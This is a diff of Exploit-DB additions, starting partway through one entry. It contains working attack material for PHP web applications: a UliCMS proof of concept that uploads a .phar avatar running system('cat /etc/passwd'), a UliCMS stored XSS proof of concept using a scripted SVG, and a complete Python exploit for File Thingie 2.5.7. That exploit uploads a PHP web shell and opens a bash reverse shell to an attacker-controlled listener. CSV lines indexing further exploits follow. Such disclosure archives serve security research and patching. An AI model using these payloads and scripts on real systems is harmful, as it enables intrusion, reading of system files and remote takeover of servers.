 3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error
 payload: <?php echo system("cat /etc/passwd"); ?>
 poc request :
 POST /dist/admin/index.php HTTP/1.1
 Host: localhost
 Content-Length: 1982
 Cache-Control: max-age=0
 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Linux"
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
 Connection: close
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="csrf_token"
 e2d428bc0585c06c651ca8b51b72fa58
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="sClass"
 UserController
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="sMethod"
 update
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="avatar"; filename="salam.phar"
 Content-Type: application/octet-stream
 <?php echo system("cat /etc/passwd"); ?>
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="edit_admin"
 edit_admin
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="id"
 12
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="firstname"
 account1
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="lastname"
 account1
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="email"
 account1@test.com
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="password"
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="password_repeat"
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="group_id"
 1
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="secondary_groups[]"
 1
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="homepage"
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="html_editor"
 ckeditor
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="admin"
 1
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="default_language"
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy
 Content-Disposition: form-data; name="about_me"
 ------WebKitFormBoundaryYB7QS1BMMo1CXZVy--
 response:
 Error
 GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
 Stack trace:
 #0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
 #1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
 #2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
 #3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
 #4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
 #5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
 #6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
 #7 {main}
 Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
 Stack trace:
 #0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
 #1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
 #2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
 #3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
 #4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
 #5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
 #6 {main}
 4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
--- a/exploits/php/webapps/51435.txt
+++ b/exploits/php/webapps/51435.txt
@ -0,0 +1,75 @@
 #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
 #Application: Ulicms
 #Version: 2023.1-sniffing-vicuna
 #Bugs:  Stored Xss
 #Technology: PHP
 #Vendor URL: https://en.ulicms.de/
 #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
 #Date of found: 04-05-2023
 #Author: Mirabbas Ağalarov
 #Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
 2. upload malicious svg file
 svg file content ===>
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 poc request:
 POST /dist/admin/fm/upload.php HTTP/1.1
 Host: localhost
 Content-Length: 663
 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
 Accept: application/json, text/javascript, */*; q=0.01
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
 X-Requested-With: XMLHttpRequest
 sec-ch-ua-mobile: ?0
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
 sec-ch-ua-platform: "Linux"
 Origin: http://localhost
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: cors
 Sec-Fetch-Dest: empty
 Referer: http://localhost/dist/admin/fm/dialog.php
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
 Connection: close
 ------WebKitFormBoundaryK3CvcSs8xZwzABCl
 Content-Disposition: form-data; name="fldr"
 ------WebKitFormBoundaryK3CvcSs8xZwzABCl
 Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
 Content-Type: image/svg+xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 ------WebKitFormBoundaryK3CvcSs8xZwzABCl--
 3. Go to http://localhost/dist/content/SVG_XSS.svg
--- a/exploits/php/webapps/51436.py
+++ b/exploits/php/webapps/51436.py
@ -0,0 +1,189 @@
 #!/usr/bin/python
 # Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
 # Google Dork: N/A
 # Date: 27th of April, 2023
 # Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
 # Software Link: https://github.com/leefish/filethingie
 # Version: 2.5.7
 # Tested on: N/A
 # CVE: N/A
 # Vulnerability originally discovered / published by Cakes
 # Reference: https://www.exploit-db.com/exploits/47349
 # Run a local listener on your machine and youre good to go
 import os
 import argparse
 import requests
 import random
 import string
 import zipfile
 from urllib.parse import urlsplit, urlunsplit, quote
 class Exploit:
    def __init__(self, target, username, password, lhost, lport):
        self.target = target
        self.username = username
        self.password = password
        self.lhost = lhost
        self.lport = lport
    def try_login(self) -> bool:
        self.session = requests.Session()
        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
        response = self.session.post(self.target, data=post_body)
        if response.status_code == 404:
            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
            return False
        elif response.status_code == 200:
            if "Invalid username or password" in response.text:
                print(f"Invalid username or password")
                return False
            return True
    def create_new_folder(self) -> bool:
        # Generate random string
        letters = string.ascii_letters
        self.payload_filename = "".join(random.choice(letters) for i in range(16))
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
        print(f"[*] Creating new folder /{self.payload_filename}")
        response = self.session.post(self.target, headers=headers, data=post_body)
        if f"index.php?dir=/{self.payload_filename}" in response.text:
            print(f"[+] Created new folder /{self.payload_filename}")
            return True
        else:
            print(f"[-] Could not create new folder /{self.payload_filename}")
            return False
    def create_payload(self) -> bool:
        try:
            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
                    zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
                    print(f"[+] Zipped payload to {self.payload_filename}.zip")
                    return True
        except:
            print(f"[-] Could not create payload to {self.payload_filename}.zip")
            return False
    def upload_payload(self) -> bool:
        # Set up the HTTP headers and data for the request
        headers = {
            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
        }
        post_body = (
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
            'Content-Type: application/octet-stream\r\n\r\n'
        )
        post_body += (
            '\r\n-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
            '2000000\r\n'
            '-----------------------------grimlockx\r\n'
            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
            'Content-Type: application/zip\r\n\r\n'
        )
        # Read the zip file contents and append them to the data
        with open(f"{self.payload_filename}.zip", "rb") as f:
            post_body += ''.join(map(chr, f.read()))
        post_body += (
            '\r\n-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="act"\r\n\r\n'
            'upload\r\n'
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="dir"\r\n\r\n'
            f'/{self.payload_filename}\r\n'
            '-----------------------------grimlockx\r\n'
            'Content-Disposition: form-data; name="submit"\r\n\r\n'
            'Upload\r\n'
            '-----------------------------grimlockx--\r\n'
        )
        print("[*] Uploading payload to the target")
        response = self.session.post(self.target, headers=headers, data=post_body)
        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
            print("[+] Uploading payload successful")
            return True
        else:
            print("[-] Uploading payload failed")
            return False
    def get_base_url(self) -> str:
        url_parts = urlsplit(self.target)
        path_parts = url_parts.path.split('/')
        path_parts.pop()
        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
        return base_url
    def unzip_payload(self) -> bool:
        print("[*] Unzipping payload")
        headers = {"Content-Type": "application/x-www-form-urlencoded"}
        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
        response = self.session.post(f"{self.target}", headers=headers, data=post_body)
        if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
            print("[+] Unzipping payload successful")
            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
            return True
        else:
            print("[-] Unzipping payload failed")
            return False
    def execute_payload(self) -> bool:
        print("[*] Trying the get a reverse shell")
        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
        print("[*] Executing payload")
        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
        print("[+] Exploit complete")
        return True
    def cleanup_local_files(self) -> bool:
        if os.path.exists(f"{self.payload_filename}.zip"):
            os.remove(f"{self.payload_filename}.zip")
            print("[+] Cleaned up zipped payload on local machine")
            return True
        print("[-] Could not clean up zipped payload on local machine")
        return False
 if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
    parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
    parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
    args = parser.parse_args()
    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
    exploit.try_login()
    exploit.create_new_folder()
    exploit.create_payload()
    exploit.upload_payload()
    exploit.unzip_payload()
    exploit.execute_payload()
    exploit.cleanup_local_files()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10292,6 +10292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,,2020-12-04,2020-12-04,0,CVE-2020-6519,,,,,
 19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",local,multiple,,2000-03-29,2012-07-14,1,CVE-2000-0244;OSVDB-6335,,,,,https://www.securityfocus.com/bid/1077/info
 40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple,,2016-11-02,2016-11-02,0,CVE-2016-9111,,,,,
 51432,exploits/multiple/local/51432.txt,"Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution",2023-05-05,8bitsec,local,multiple,,2023-05-05,2023-05-05,0,,,,,,
 19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2017-11-22,1,CVE-1999-0689;OSVDB-1072,,,,,https://www.securityfocus.com/bid/636/info
 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013
@ -15725,6 +15726,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
 38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",webapps,php,,2013-08-26,2015-11-17,1,CVE-2013-4727;OSVDB-96666,,,,,https://www.securityfocus.com/bid/62010/info
 2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",webapps,php,,2006-12-07,,1,OSVDB-32142;CVE-2006-6544;OSVDB-32141;CVE-2006-6462,,,,,
 51422,exploits/php/webapps/51422.txt,"Cmaps v8.0 - SQL injection",2023-05-05,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-29809,,,,,
 6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,webapps,php,,2008-08-25,2016-12-20,1,OSVDB-48103;CVE-2008-3926;OSVDB-48102;CVE-2008-3925;OSVDB-48101;CVE-2008-3924;OSVDB-48100;OSVDB-48099;CVE-2008-3923;OSVDB-48098,,,,,
 5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php,,2008-06-21,2016-12-09,1,OSVDB-46868;CVE-2008-2985;OSVDB-46866;CVE-2008-2984,,,,http://www.exploit-db.comcmreams_1-3-1-1_beta-2.zip,
 12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,webapps,php,,2010-04-21,,0,CVE-2009-2439;OSVDB-55785,,,,,
@ -17458,6 +17460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,webapps,php,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58945/info
 37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",webapps,php,,2012-03-29,2015-05-16,1,,,,,,https://www.securityfocus.com/bid/52781/info
 40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,webapps,php,,2016-11-22,2016-11-22,1,,,,,http://www.exploit-db.comEasyPHP-Devserver-16.1.1-setup.exe,
 51430,exploits/php/webapps/51430.txt,"EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)",2023-05-05,"Rafael Pedrero",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17723,,,,,https://www.securityfocus.com/bid/14131/info
 25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17733,,,,,https://www.securityfocus.com/bid/14131/info
 25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17732,,,,,https://www.securityfocus.com/bid/14131/info
@ -18250,6 +18253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
 6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
 12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
 51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
 11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
 30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@ -19899,7 +19903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,webapps,php,,2005-03-31,2013-05-10,1,CVE-2005-0955;OSVDB-15168,,,,,https://www.securityfocus.com/bid/12957/info
 34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,webapps,php,,2009-05-25,2014-10-12,1,CVE-2009-2289;OSVDB-54710,,,,,https://www.securityfocus.com/bid/44555/info
 35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php,,2011-03-03,2014-12-02,1,,,,,,https://www.securityfocus.com/bid/46771/info
-51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40347,,,,,
+51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40347,,,,,
 5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php,,2008-05-13,,1,OSVDB-45502;CVE-2008-2282,,,,,
 1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,webapps,php,,2006-04-17,2016-11-29,1,OSVDB-24743;CVE-2006-1919,,,,,
 49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",2021-05-04,argenestel,webapps,php,,2021-05-04,2021-10-29,0,,,,,,
@ -20287,6 +20291,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,webapps,php,,2010-05-13,,1,OSVDB-64704;CVE-2010-2129,,,,,
 15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,webapps,php,,2010-09-28,2010-09-28,1,,,,,,
 12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,webapps,php,,2010-05-16,,1,OSVDB-64716;CVE-2010-2047,,,,,
 51428,exploits/php/webapps/51428.txt,"Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47874,,,,,
 51426,exploits/php/webapps/51426.txt,"Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47878,,,,,
 51427,exploits/php/webapps/51427.txt,"Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47876,,,,,
 51425,exploits/php/webapps/51425.txt,"Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47877,,,,,
 51423,exploits/php/webapps/51423.txt,"Jedox 2022.4.2 - Code Execution via RPC Interfaces",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47879,,,,,
 51429,exploits/php/webapps/51429.txt,"Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47880,,,,,
 51424,exploits/php/webapps/51424.txt,"Jedox 2022.4.2 - Remote Code Execution via Directory Traversal",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47875,,,,,
 31393,exploits/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-1355;OSVDB-43331,,,,,https://www.securityfocus.com/bid/28221/info
 30701,exploits/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File Inclusion",2007-10-22,hack2prison,webapps,php,,2007-10-22,2014-01-05,1,CVE-2007-5706;OSVDB-41869,,,,,https://www.securityfocus.com/bid/26171/info
 45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80,2018-11-02,2018-11-02,0,,"SQL Injection (SQLi)",,,,
@ -22069,6 +22080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 29294,exploits/php/webapps/29294.html,"Knusperleicht Shoutbox 2.6 - 'Shout.php' HTML Injection",2006-12-18,IMHOT3B,webapps,php,,2006-12-18,2013-10-30,1,CVE-2006-6721;OSVDB-31516,,,,,https://www.securityfocus.com/bid/21637/info
 23384,exploits/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 - '$path' Remote File Inclusion",2003-11-17,"RusH security team",webapps,php,,2003-11-17,2012-12-14,1,,,,,,https://www.securityfocus.com/bid/9054/info
 51388,exploits/php/webapps/51388.py,"KodExplorer 4.49 - CSRF to Arbitrary File Upload",2023-04-25,"Mr Empy",webapps,php,,2023-04-25,2023-04-25,0,CVE-2022-4944,,,,,
 51419,exploits/php/webapps/51419.txt,"KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)",2023-05-05,nu11secur1ty,webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 37388,exploits/php/webapps/37388.txt,"Koha 3.20.1 - Directory Traversal",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4632;OSVDB-123654;OSVDB-123653,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37389,exploits/php/webapps/37389.txt,"Koha 3.20.1 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2016-08-31,0,CVE-2015-4631;CVE-2015-4630,,,,http://www.exploit-db.comKoha-3.20.00.zip,
 37387,exploits/php/webapps/37387.txt,"Koha 3.20.1 - Multiple SQL Injections",2015-06-26,"Raschin Tavakoli_ Bernhard Garn_ Peter Aufner & Dimitris Simos",webapps,php,,2015-06-26,2015-06-26,0,CVE-2015-4633;OSVDB-123650,,,,http://www.exploit-db.comKoha-3.20.00.zip,
@ -24668,6 +24680,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info
 51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-2246,,,,,
 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 -  SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,,
 42640,exploits/php/webapps/42640.txt,"Online Print Business 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",webapps,php,,2017-09-10,2017-09-10,0,,,,,,
@ -27645,6 +27658,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
